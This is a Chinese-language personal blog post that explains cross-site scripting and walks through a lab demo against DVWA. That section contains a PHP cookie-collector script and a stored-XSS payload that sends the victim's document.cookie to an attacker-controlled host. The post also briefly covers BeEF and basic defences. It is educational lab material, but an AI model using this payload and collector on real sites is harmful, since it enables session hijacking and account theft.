<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><title>XSS | null</title><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.staticfile.org/font-awesome/4.7.0/css/font-awesome.min.css"><script>var GLOBAL = { 
  root: '/',
  algolia: undefined,
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  }
} </script><link rel="icon" href="/favicon.ico"><meta name="generator" content="Hexo 4.2.1"><link rel="alternate" href="/atom.xml" title="null" type="application/atom+xml">
</head><body><canvas class="fireworks"></canvas><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar"><div class="toggle-sidebar-info text-center"><span data-toggle="Toggle article">Toggle site</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">Catalog</div><div class="sidebar-toc__progress"><span class="progress-notice">You've read</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-5"><a class="toc-link" href="#XSS简述"><span class="toc-number">1.</span> <span class="toc-text">XSS简述</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#危害"><span class="toc-number">2.</span> <span class="toc-text">危害</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#反射型XSS"><span class="toc-number">3.</span> <span class="toc-text">反射型XSS</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#存储型XSS"><span class="toc-number">4.</span> <span class="toc-text">存储型XSS</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#自动化XSS"><span class="toc-number">5.</span> <span class="toc-text">自动化XSS</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#防御"><span class="toc-number">6.</span> <span class="toc-text">防御</span></a></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/img/avatar.png"></div><div class="author-info__name text-center">Y0un9</div><div class="author-info__description text-center">Y0un9的博客</div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">Articles</span><span class="pull-right">17</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">Tags</span><span class="pull-right">1</span></a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(http://attach.bbs.miui.com/forum/201306/23/110328s72xxse7lfis9fnd.jpg)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/"></a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus"><a class="site-page" href="/">Home</a><a class="site-page" href="/archives">Archives</a><a class="site-page" href="/tags">Tags</a><a class="site-page" href="/categories">Categories</a></span></div><div id="post-info"><div id="post-title">XSS</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2020-06-07 </time></div></div></div><div class="layout" id="content-inner"><article id="post"><div id="post-content"><h5 id="XSS简述"><a href="#XSS简述" class="headerlink" title="XSS简述"></a>XSS简述</h5><p>xss（跨站脚本）是指恶意利用网站提供的接口，没有对用户提交的数据进行转义，或者过滤不足的缺点，进而添加一些代码嵌入到web页面中，使别的用户访问都会执行相应的嵌入代码。</p>
<p>xss可以盗取用户资料，利用用户身份进行某种动作或者对范跟着进行病毒侵害。</p>
<h5 id="危害"><a href="#危害" class="headerlink" title="危害"></a>危害</h5><ol>
<li>盗取各类用户账号</li>
<li>控制企业数据</li>
<li>盗取重要数据</li>
<li>非法转账</li>
<li>强制发送电子邮件</li>
<li>网站挂马</li>
<li>控制受害者机器向别的网站发起攻击</li>
</ol>
<h5 id="反射型XSS"><a href="#反射型XSS" class="headerlink" title="反射型XSS"></a>反射型XSS</h5><p>非持久性xss，漏洞产生的原因在于攻击者注入的数据反映在响应中。如包含一个带XSS攻击向量的链接，每次攻击都需要用户的点击。</p>
<p>PS:反射型的xss实际作用不大，毕竟没人会自己打自己</p>
<h5 id="存储型XSS"><a href="#存储型XSS" class="headerlink" title="存储型XSS"></a>存储型XSS</h5><p>一般是XSS代码放在了网站数据库，页面被用户打开即执行。存储型XSS危害更大。如留言板XSS。用户提交的XSS代码会被保存到数据库中。当目标用户查看留言板时，就会执行xss代码。这里使用kali和DVWA做一个盗取cookie的例子。</p>
<ul>
<li><p>打开kali运行apache</p>
<p>   <code>service apache2 start</code></p>
</li>
<li><p>在/var/www/html/目录下写入一个cookie_rec.php，这里我们接受cookie参数，并把内容写入到cookie.txt文件夹中</p>
</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">$cookie &#x3D; $_GET[&#39;cookie&#39;];</span><br><span class="line">$log &#x3D; fopen(&#39;cookie.txt&#39;,&#39;a&#39;);</span><br><span class="line">fwrite($log,$cookie);</span><br><span class="line">fclose($log);</span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<ul>
<li>别忘了给文件都增加一个权限才能成功写入cookie.txt文件。cd到 /var/www/,这里为了简单我就直接全部777了</li>
</ul>
<p><code>chmod -R 777 html</code></p>
<ul>
<li>在DVWA中修改输入框的最长文字长度限制，可以把maxlength属性直接去掉或者改为一个更大的数字</li>
</ul>
<p><img src="/images/pasted-34.png" alt="upload successful"></p>
<ul>
<li>输入xss代码</li>
</ul>
<p><code>&lt;script&gt;window.open(&#39;http://192.168.124.129/cookie_rec.php?cookie=&#39;+document.cookie)&lt;/script&gt;</code></p>
<p>这里实现一个页面跳转，并在跳转的时候获取本地的cookie值发送给cookie_rec.php。这样就实现了盗取本地cookie到指定服务器。</p>
<p><img src="/images/pasted-35.png" alt="upload successful"></p>
<p>可以看到这里已经成功实现了页面跳转，并且带上了cookie值</p>
<p><img src="/images/pasted-36.png" alt="upload successful"></p>
<p>再到kali上看一下，成功读取到了cookie</p>
<p><img src="/images/pasted-37.png" alt="upload successful"></p>
<p>PS:一般浏览器都会关闭掉默认的链接跳转，不过大多数用户为了访问还是会允许这个xss代码执行</p>
<h5 id="自动化XSS"><a href="#自动化XSS" class="headerlink" title="自动化XSS"></a>自动化XSS</h5><p>用kali上集成的beff即可</p>
<p>commands内的是我们可以对肉鸡进行的一些操作</p>
<p><img src="/images/pasted-39.png" alt="upload successful"></p>
<ol>
<li>绿色对目标主机生效并且不会被发现（一般是观察类）</li>
<li>橙色对目标主机生效并且可能会被发现</li>
<li>灰色对目标主机未必生效（可以进行验证）</li>
<li>红色对目标主机不生效</li>
</ol>
<p><img src="/images/pasted-40.png" alt="upload successful"></p>
<h5 id="防御"><a href="#防御" class="headerlink" title="防御"></a>防御</h5><ol>
<li>http-only(防止XSS)</li>
</ol>
<p>如果在Cookie中设置了”HttpOnly”属性，那么通过程序(JS脚本、Applet等)将无法读取到Cookie信息，这样能有效的防止XSS攻击。</p>
<ol start="2">
<li>对用户输入的信息进行过滤和转义</li>
</ol>
</div><div class="post-meta__tag-list"></div></article><nav id="pagination"><div class="prev-post pull-left"><a href="/2020/06/09/%E9%9A%8F%E7%AC%94/"><i class="fa fa-chevron-left">  </i><span>随笔</span></a></div><div class="next-post pull-right"><a href="/2020/06/03/TCP%E5%8D%8F%E8%AE%AE/"><span>TCP三次握手和四次握手</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer><div class="layout" id="footer"><div class="copyright">©2013 - 2020 By Y0un9</div><div class="framework-info"><span>Driven - </span><a href="http://hexo.io" target="_blank" rel="noopener"><span>Hexo</span></a><span> |  </span><span>Theme - </span><a href="https://github.com/Molunerfinn/hexo-theme-melody" target="_blank" rel="noopener"><span>Melody</span></a></div><div class="busuanzi"><script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file-o"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="/js/third-party/anime.min.js"></script><script src="/js/third-party/jquery.min.js"></script><script src="/js/third-party/jquery.fancybox.min.js"></script><script src="/js/third-party/velocity.min.js"></script><script src="/js/third-party/velocity.ui.min.js"></script><script src="/js/utils.js"></script><script src="/js/fancybox.js"></script><script src="/js/sidebar.js"></script><script src="/js/copy.js"></script><script src="/js/fireworks.js"></script><script src="/js/transition.js"></script><script src="/js/scroll.js"></script><script src="/js/head.js"></script></body></html>